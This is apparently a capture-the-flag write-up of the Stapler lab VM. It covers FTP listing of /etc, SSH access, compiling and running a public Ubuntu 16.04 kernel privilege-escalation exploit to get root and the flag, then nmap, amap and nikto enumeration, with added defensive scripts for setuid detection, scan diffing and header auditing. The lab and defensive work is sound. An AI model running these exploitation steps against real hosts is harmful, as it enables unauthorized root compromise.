-rw-------    1 0        0            2869 Jun 03  2016 passwd-
drwxr-xr-x    4 0        0            4096 Jun 03  2016 perl
drwxr-xr-x    3 0        0            4096 Jun 03  2016 php
drwxr-xr-x    3 0        0            4096 Jun 06  2016 phpmyadmin
drwxr-xr-x    3 0        0            4096 Jun 03  2016 pm
drwxr-xr-x    5 0        0            4096 Jun 03  2016 polkit-1
drwxr-xr-x    3 0        0            4096 Jun 03  2016 postfix
drwxr-xr-x    4 0        0            4096 Jun 03  2016 ppp
-rw-r--r--    1 0        0             575 Oct 22  2015 profile
drwxr-xr-x    2 0        0            4096 Jun 03  2016 profile.d
-rw-r--r--    1 0        0            2932 Oct 25  2014 protocols
drwxr-xr-x    2 0        0            4096 Jun 03  2016 python
drwxr-xr-x    2 0        0            4096 Jun 03  2016 python2.7
drwxr-xr-x    2 0        0            4096 Jun 03  2016 python3
drwxr-xr-x    2 0        0            4096 Jun 03  2016 python3.5
-rwxr-xr-x    1 0        0             472 Jun 06  2016 rc.local
drwxr-xr-x    2 0        0            4096 Jun 06  2016 rc0.d
drwxr-xr-x    2 0        0            4096 Jun 06  2016 rc1.d
drwxr-xr-x    2 0        0            4096 Jun 06  2016 rc2.d
drwxr-xr-x    2 0        0            4096 Jun 06  2016 rc3.d
drwxr-xr-x    2 0        0            4096 Jun 06  2016 rc4.d
drwxr-xr-x    2 0        0            4096 Jun 06  2016 rc5.d
drwxr-xr-x    2 0        0            4096 Jun 06  2016 rc6.d
drwxr-xr-x    2 0        0            4096 Jun 06  2016 rcS.d
-rw-r--r--    1 0        0              58 Nov 20 13:04 resolv.conf
drwxr-xr-x    5 0        0            4096 Jun 06  2016 resolvconf
-rwxr-xr-x    1 0        0             268 Nov 10  2015 rmt
-rw-r--r--    1 0        0             887 Oct 25  2014 rpc
-rw-r--r--    1 0        0            1371 Jan 27  2016 rsyslog.conf
drwxr-xr-x    2 0        0            4096 Jun 03  2016 rsyslog.d
drwxr-xr-x    3 0        0            4096 Nov 20 13:04 samba
-rw-r--r--    1 0        0            3663 Jun 09  2015 screenrc
-rw-r--r--    1 0        0            4038 Mar 29  2016 securetty
drwxr-xr-x    4 0        0            4096 Jun 03  2016 security
drwxr-xr-x    2 0        0            4096 Jun 03  2016 selinux
-rw-r--r--    1 0        0           19605 Oct 25  2014 services
drwxr-xr-x    2 0        0            4096 Jun 03  2016 sgml
-rw-r-----    1 0        42           4518 Jun 05  2016 shadow
-rw-------    1 0        0            1873 Jun 03  2016 shadow-
-rw-r--r--    1 0        0             125 Jun 03  2016 shells
drwxr-xr-x    2 0        0            4096 Jun 03  2016 skel
-rw-r--r--    1 0        0             100 Nov 25  2015 sos.conf
drwxr-xr-x    2 0        0            4096 Jun 04  2016 ssh
drwxr-xr-x    4 0        0            4096 Jun 03  2016 ssl
-rw-r--r--    1 0        0             644 Jun 04  2016 subgid
-rw-------    1 0        0             625 Jun 03  2016 subgid-
-rw-r--r--    1 0        0             644 Jun 04  2016 subuid
-rw-------    1 0        0             625 Jun 03  2016 subuid-
-r--r-----    1 0        0             769 Jun 05  2016 sudoers
drwxr-xr-x    2 0        0            4096 Jun 03  2016 sudoers.d
-rw-r--r--    1 0        0            2227 Jun 03  2016 sysctl.conf
drwxr-xr-x    2 0        0            4096 Jun 03  2016 sysctl.d
drwxr-xr-x    5 0        0            4096 Jun 03  2016 systemd
drwxr-xr-x    2 0        0            4096 Jun 03  2016 terminfo
-rw-r--r--    1 0        0              14 Jun 03  2016 timezone
drwxr-xr-x    2 0        0            4096 Apr 12  2016 tmpfiles.d
-rw-r--r--    1 0        0            1260 Mar 16  2016 ucf.conf
drwxr-xr-x    4 0        0            4096 Jun 03  2016 udev
drwxr-xr-x    3 0        0            4096 Jun 03  2016 ufw
drwxr-xr-x    2 0        0            4096 Jun 03  2016 update-motd.d
drwxr-xr-x    2 0        0            4096 Jun 03  2016 update-notifier
drwxr-xr-x    2 0        0            4096 Jun 03  2016 vim
drwxr-xr-x    3 0        0            4096 Jun 03  2016 vmware-tools
-rw-r--r--    1 0        0             278 Jun 03  2016 vsftpd.banner
-rw-r--r--    1 0        0               0 Jun 03  2016 vsftpd.chroot_list
-rw-r--r--    1 0        0            5961 Jun 04  2016 vsftpd.conf
-rw-r--r--    1 0        0               0 Jun 03  2016 vsftpd.user_list
lrwxrwxrwx    1 0        0              23 Jun 03  2016 vtrgb -> /etc/alternatives/vtrgb
-rw-r--r--    1 0        0            4942 Jan 08  2016 wgetrc
drwxr-xr-x    3 0        0            4096 Jun 03  2016 xdg
drwxr-xr-x    2 0        0            4096 Jun 03  2016 xml
drwxr-xr-x    2 0        0            4096 Jun 03  2016 zsh
226 Directory send OK.
ftp>
There is so much stuff in there it's hard to know where to start: passwd, the apache2 folder, conf files and more.
SSH with credentials
Now let's see what SSH access MFrei has. He's not got root access and isn't in the sudoers file, but he can browse around and run some commands. Let's see exactly what Linux we're running, to see if there is an exploit available.
MFrei@red:/$ uname -a
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux

root@red:/tmp/ebpf_mapfd_doubleput_exploit# cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
NAME="Ubuntu"
VERSION="16.04 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04 LTS"
VERSION_ID="16.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial
Privilege Escalation Exploit
https://www.exploit-db.com/exploits/39772/ has one that fits nicely, and at the bottom there is a link to a zip file. I stored this in my home directory as exploit.tar. Use scp to get it onto the machine, since we have SSH access:
root@kali2017-1:~# scp exploit.tar MFrei@10.0.0.4:/tmp/
-----------------------------------------------------------------
~          Barry, don't forget to put a message here          ~
-----------------------------------------------------------------
MFrei@10.0.0.4's password:
exploit.tar                                   100%   20KB  69.0KB/s   00:00
SSH back onto the machine, extract the tar and run the shell script to compile it:
root@kali2017-1:~# ssh MFrei@10.0.0.4
-----------------------------------------------------------------
~          Barry, don't forget to put a message here          ~
-----------------------------------------------------------------
MFrei@10.0.0.4's password:
Welcome back!
MFrei@red:~$ ls
MFrei@red:~$ cd /tmp
MFrei@red:/tmp$ ls
decr.c  exploit.tar  testdir  vmware-root
MFrei@red:/tmp$ tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
MFrei@red:/tmp$ ls
ebpf_mapfd_doubleput_exploit  exploit.tar  testdir  vmware-root
MFrei@red:/tmp$ cd ebpf_mapfd_doubleput_exploit/
MFrei@red:/tmp/ebpf_mapfd_doubleput_exploit$ ls
compile.sh  doubleput.c  hello.c  suidhelper.c
MFrei@red:/tmp/ebpf_mapfd_doubleput_exploit$ compile.sh
-bash: compile.sh: command not found
MFrei@red:/tmp/ebpf_mapfd_doubleput_exploit$ ./ compile.sh
-bash: ./: Is a directory
MFrei@red:/tmp/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function ‘make_setuid’:
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
     .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
     .license = (__aligned_u64)""
               ^
MFrei@red:/tmp/ebpf_mapfd_doubleput_exploit$ ls
compile.sh  doubleput  doubleput.c  hello  hello.c  suidhelper  suidhelper.c
MFrei@red:/tmp/ebpf_mapfd_doubleput_exploit$ doubleput
-bash: doubleput: command not found
MFrei@red:/tmp/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:/tmp/ebpf_mapfd_doubleput_exploit# whoami
root
root@red:/tmp/ebpf_mapfd_doubleput_exploit#
As is the way with these things, the flag is in the root folder:
root@red:/root# cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
                 _,._     |       |
            __.o`   o`"-. |       |
         .-O o `"-.o   O )_,._    |       |
        ( o   O  o )--.-"`O   o"-.`'-----'`
         '--------'  (   o  O    o)
                      `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
root@red:/root#
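From the defender's side, the tell-tale line in that exploit run is “suid file detected, launching rootshell…”: exploit-db 39772 (Jann Horn's bpf double-fdput bug, CVE-2016-4557) gets root by making its suidhelper binary setuid root and then executing it, so what is left on disk is a new setuid-root file in /tmp that no package installed. The script below is the check I would run for that. It is an added example, not from the writeup or the exploit: the baseline set of expected setuid binaries is a placeholder (on a real host take it from a golden image or from `find / -perm -4000 -uid 0` on a known-good system), and the root_uid parameter exists only so the self-test can run unprivileged by treating the current user as root.

```python
"""Find setuid-root binaries that are not in a known baseline, the artefact a
local root exploit like the one above leaves behind. Added example, not code
from the writeup. BASELINE is a placeholder, not this box's real list."""
import os
import stat
import tempfile

# Hypothetical baseline of setuid-root binaries you expect to exist.
BASELINE = {"/usr/bin/sudo", "/usr/bin/passwd", "/bin/su"}


def is_setuid_root(mode, uid, root_uid=0):
    """Regular file, owned by root, setuid bit set. Directories and symlinks
    never count; setgid-root (S_ISGID) would be the sibling check."""
    return stat.S_ISREG(mode) and uid == root_uid and bool(mode & stat.S_ISUID)


def classify(entries, baseline=BASELINE, root_uid=0):
    """entries: iterable of (path, st_mode, st_uid). Returns the setuid-root
    paths that are not in the baseline, sorted. Pure, so it is unit-testable
    without touching a filesystem."""
    return sorted(path for path, mode, uid in entries
                  if is_setuid_root(mode, uid, root_uid) and path not in baseline)


def walk_setuid(root, baseline=BASELINE, root_uid=0):
    """Walk a tree and return unexpected setuid-root binaries. Uses lstat so a
    symlink planted by an attacker cannot redirect the check at another file;
    unreadable entries are skipped rather than aborting the sweep."""
    entries = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            entries.append((path, st.st_mode, st.st_uid))
    return classify(entries, baseline, root_uid)


def demo_in_tempdir():
    """Self-test: build a throwaway tree with one setuid file and one plain file
    (both owned by us, so the current uid stands in for root) and return the
    basenames the walker flags."""
    d = tempfile.mkdtemp()
    for name, mode in (("suidhelper", 0o4755), ("plain", 0o755)):
        path = os.path.join(d, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return [os.path.basename(p) for p in walk_setuid(d, baseline=set(), root_uid=os.getuid())]


if __name__ == "__main__":
    # Real use: sweep the places an unprivileged user can write to.
    for hit in walk_setuid("/tmp") + walk_setuid("/var/tmp") + walk_setuid("/dev/shm"):
        print("unexpected setuid-root binary:", hit)
    print("self-test:", demo_in_tempdir())
```

Sweeping only /tmp, /var/tmp and /dev/shm is cheap enough to run from cron; a full-filesystem sweep is the same call with "/" and a proper baseline. Mounting those world-writable directories nosuid removes the exploit's final step altogether, which is the fix rather than the detection.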
So that's one way, but I didn't even get to look at the other attack entries. The website, another possible WordPress site and probably some other methods exist on this box.
ports.conf says it's listening on port 12380, which was not picked up by the short nmap scan, so there are definitely at least two web servers to look at.
I’ll return to this later.
EDIT
OK, I'm back on this now and want to take a look at the web side of things. On some recent boxes I've been caught out by insufficient enumeration: relying on short nmap scans of the main ports and not using other scans to verify the protocols (you can't assume port 80 is plain HTTP and 443 is definitely SSL). So my enumeration plan is: full-port nmap scans for TCP and UDP, an amap scan of the ports to confirm the protocols, nikto and dirbuster. Also check out robots.txt.
NMAP – All Ports
My all ports scan is back now and well worth the wait:
root@kali2017-1:~# nmap -sS -sU -T4 -n 10.0.0.4 -p 0-65535

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-21 12:59 GMT
Stats: 0:02:12 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 35.95% done; ETC: 13:05 (0:03:57 remaining)
Stats: 0:05:17 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 76.73% done; ETC: 13:05 (0:01:36 remaining)
Stats: 0:13:15 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 92.31% done; ETC: 13:12 (0:00:32 remaining)
Nmap scan report for 10.0.0.4
Host is up (0.00021s latency).
Not shown: 65535 open|filtered ports, 65529 filtered ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
139/tcp   open  netbios-ssn
3306/tcp  open  mysql
12380/tcp open  unknown
137/udp   open  netbios-ns
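Eyeballing two scan tables for differences is exactly where ports get missed, so here is a small script that diffs them. It is an added example, not part of the original writeup; the two inputs are the port tables from the first quick scan and the full scan above, trimmed to the port lines, and followup_command simply builds the nmap invocation for whatever the diff turns up (nmap's -p accepts T: and U: prefixed lists, and mixing them needs both a TCP and a UDP scan type on the command line). The 65535 UDP ports shown as open|filtered are the usual UDP ambiguity: no reply means either open or dropped, so only 137/udp, which answered, is reported open.

```python
"""Diff a quick nmap scan against a full-range one and report what the quick
scan missed (and what has since disappeared). Added example, not from the
writeup; the inputs are the port tables from the two scans above."""
import re

# Port table from the first, default-ports scan (constructed from the page).
QUICK_SCAN = """
PORT     STATE  SERVICE
20/tcp   closed ftp-data
21/tcp   open   ftp
22/tcp   open   ssh
53/tcp   open   domain
80/tcp   open   http
139/tcp  open   netbios-ssn
666/tcp  open   doom
3306/tcp open   mysql
"""

# Port table from the full TCP+UDP scan (constructed from the page).
FULL_SCAN = """
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
139/tcp   open  netbios-ssn
3306/tcp  open  mysql
12380/tcp open  unknown
137/udp   open  netbios-ns
"""

# nmap normal output: "<port>/<proto>  <state>  <service> [version...]"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(open\|filtered|open|closed|filtered)\s+(\S+)")


def parse_ports(text):
    """Return {(port, proto): (state, service)} for every port line."""
    ports = {}
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            ports[(int(m.group(1)), m.group(2))] = (m.group(3), m.group(4))
    return ports


def open_ports(text):
    """Only confirmed-open ports; 'closed' and 'open|filtered' are excluded."""
    return {k for k, (state, _svc) in parse_ports(text).items() if state == "open"}


def missed_by(quick, full):
    """(ports open in full but absent from quick, ports open in quick but gone
    from full). The second list matters too: a service that vanished between
    scans is either flaky or was shut down, and deserves a re-check."""
    q, f = open_ports(quick), open_ports(full)
    return sorted(f - q), sorted(q - f)


def followup_command(host, ports):
    """Build one nmap command that service-scans the missed ports. -p takes
    T:/U: prefixed lists; a UDP list also needs -sU alongside -sS."""
    tcp = ",".join(str(p) for p, proto in ports if proto == "tcp")
    udp = ",".join(str(p) for p, proto in ports if proto == "udp")
    spec = ",".join(s for s in (("T:" + tcp) if tcp else "", ("U:" + udp) if udp else "") if s)
    scan_types = "-sS" + (" -sU" if udp else "")
    return "nmap %s -sV -sC -p %s %s" % (scan_types, spec, host)


if __name__ == "__main__":
    missed, gone = missed_by(QUICK_SCAN, FULL_SCAN)
    print("missed by quick scan:", missed)
    print("open before, not now:", gone)
    print(followup_command("10.0.0.4", missed))
```

Run on the two tables above it reports 137/udp and 12380/tcp as missed, and also flags 666/tcp (“doom” in the first scan) as open before but absent from the full scan, something the walk-through does not comment on and which is worth a re-probe before deciding it was noise.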
Two ports I’d not seen on the initial scan. I’ll put port 137 on the back burner for now as it’s clearly not web, but will quickly check out 12380 with a more thorough nmap scan of just that port:
root@kali2017-1:~# nmap -A -n -P0 -T5 -p 12380 10.0.0.4
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-21 13:30 GMT
Nmap scan report for 10.0.0.4
Host is up (0.00082s latency).
PORT      STATE SERVICE VERSION
12380/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
OK so another web-related port. So let’s give amap a spin. My VMware crashed (Windows Defender I think) so the Stapler machine now has a new IP, 10.0.0.44:
root@kali2017-1:~# amap -A 10.0.0.44 80
amap v5.4 (www.thc.org/thc-amap) started at 2017-11-21 14:26:24 - APPLICATION MAPPING mode
Protocol on 10.0.0.44:80/tcp matches http
Unidentified ports: none.
amap v5.4 finished at 2017-11-21 14:26:31
root@kali2017-1:~# amap -A 10.0.0.44 12380
amap v5.4 (www.thc.org/thc-amap) started at 2017-11-21 14:26:36 - APPLICATION MAPPING mode
Protocol on 10.0.0.44:12380/tcp matches http
Protocol on 10.0.0.44:12380/tcp matches http-apache-2
Protocol on 10.0.0.44:12380/tcp matches ntp
Protocol on 10.0.0.44:12380/tcp matches ssl
Unidentified ports: none.
So port 80 is straightforward, but port 12380 isn’t: amap matches other protocols on it, including SSL. Now run nikto on both web ports:
root@kali2017-1:~# nikto -host 10.0.0.44
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.0.44
+ Target Hostname:    10.0.0.44
+ Target Port:        80
+ Start Time:         2017-11-21 14:29:40 (GMT0)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
+ End Time:           2017-11-21 14:29:54 (GMT0) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali2017-1:~# nikto -host 10.0.0.44 -port 12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.0.44
+ Target Hostname:    10.0.0.44
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers: ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2017-11-21 14:32:55 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '10.0.0.44' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7672 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2017-11-21 14:34:46 (GMT0) (111 seconds)
---------------------------------------------------------------------------
Not much on port 80, apart from a couple of files (/.bashrc and /.profile) that suggest the web root is a user’s home directory. More going on on port 12380 though:
- an SSL cert, so I need to check out the https side
- a robots.txt file with two entries: /admin112233/ and /blogblog/
- an Apache default file at /icons/README
- a phpMyAdmin directory at /phpmyadmin/
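Most of what nikto reported for 12380 can be read straight off a single HTTP response, which is also how you would verify a fix. As an added example (my code, not from the original write-up), the Python below parses a constructed response modelled on those nikto findings (the Apache/2.4.18 banner, the hex ETag, the stray ‘dave’ header, no security headers) and lists the same issues, then shows the same server with the problems corrected. The sample responses and the `parse_response` / `audit_headers` names are my own; nothing here touches the network.

```python
"""Audit a raw HTTP response for the header weaknesses nikto flagged.

Added example (not code from the original post). The sample responses are
constructed; the weak one mirrors what nikto reported for port 12380 above.
"""
import re

# Security headers a hardened site should send. The value marks headers that
# only make sense on an HTTPS response (HSTS is skipped over plain HTTP).
EXPECTED_HEADERS = {
    "x-frame-options": False,
    "x-content-type-options": False,
    "x-xss-protection": False,
    "strict-transport-security": True,
}

# Headers that are normal to see; anything outside this set is reported,
# which is how nikto surfaced the 'dave' and 'x-ob_mode' headers.
COMMON_HEADERS = {
    "date", "server", "content-type", "content-length", "connection",
    "last-modified", "etag", "accept-ranges", "vary", "cache-control",
    "content-encoding", "keep-alive", "set-cookie", "location", "expires",
    "pragma", "transfer-encoding", "content-security-policy",
    "referrer-policy",
} | set(EXPECTED_HEADERS)

# Apache's FileETag builds the tag from hex file metadata fields joined
# with '-' (e.g. "15-5347c53a972d1"); an opaque random tag does not match.
APACHE_FILE_ETAG = re.compile(r'^(W/)?"[0-9a-f]+(-[0-9a-f]+){1,2}"$', re.I)


def parse_response(raw):
    """Split a raw HTTP/1.1 response into (status line, {lowercase name: value})."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:  # ignore malformed header lines with no colon
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def audit_headers(raw, over_tls):
    """Return a list of findings; an empty list means the response looks hardened."""
    _status, headers = parse_response(raw)
    findings = []
    for name, tls_only in EXPECTED_HEADERS.items():
        if tls_only and not over_tls:
            continue
        if name not in headers:
            findings.append(f"missing {name}")
    server = headers.get("server", "")
    if re.search(r"/\d", server):  # 'Apache/2.4.18 (Ubuntu)' vs plain 'Apache'
        findings.append(f"server header discloses version: {server}")
    etag = headers.get("etag", "")
    if APACHE_FILE_ETAG.match(etag):
        findings.append(f"etag exposes file metadata: {etag}")
    for name, value in headers.items():
        if name not in COMMON_HEADERS:
            findings.append(f"uncommon header {name}: {value}")
    return findings


# Constructed response modelled on the nikto output for port 12380.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Tue, 21 Nov 2017 14:32:55 GMT\r\n"
    "Server: Apache/2.4.18 (Ubuntu)\r\n"
    "Last-Modified: Fri, 03 Jun 2016 12:00:00 GMT\r\n"
    'ETag: "15-5347c53a972d1"\r\n'
    "Accept-Ranges: bytes\r\n"
    "Content-Length: 21\r\n"
    "dave: Soemthing doesn't look right here\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>Initech</html>\n"
)

# Constructed response from the same server with the issues fixed.
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Tue, 21 Nov 2017 14:32:55 GMT\r\n"
    "Server: Apache\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "X-XSS-Protection: 1; mode=block\r\n"
    "Content-Length: 21\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>Initech</html>\n"
)

if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(f"{label}: {audit_headers(raw, over_tls=True) or ['no findings']}")
```

On the Apache side the hardened response corresponds to `ServerTokens Prod`, `FileETag None` and `Header always set …` lines for each security header (mod_headers); running the audit against the live response after the change is the quick way to confirm the config actually took effect on the right VirtualHost.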
Let’s see what’s at port 80 in Firefox
Not much there, and the scans don’t indicate much either. I ran dirb on it, which didn’t find anything else. So onto 12380.
A basic website with little functionality. Page source didn’t show much other than a message from HR and a Base64 encoded image. Maybe look into that another time.
Try the https version and there are the two folders from robots.txt, including what looks like a troll at admin112233. To cut a long story short, there is a WordPress site at https://10.0.0.44:12380/blogblog
Our mate John gets a second name here. I fire up Burp Suite and spider the site, plus run Dirbuster, which brings up a few things: many of the WordPress directories are listable.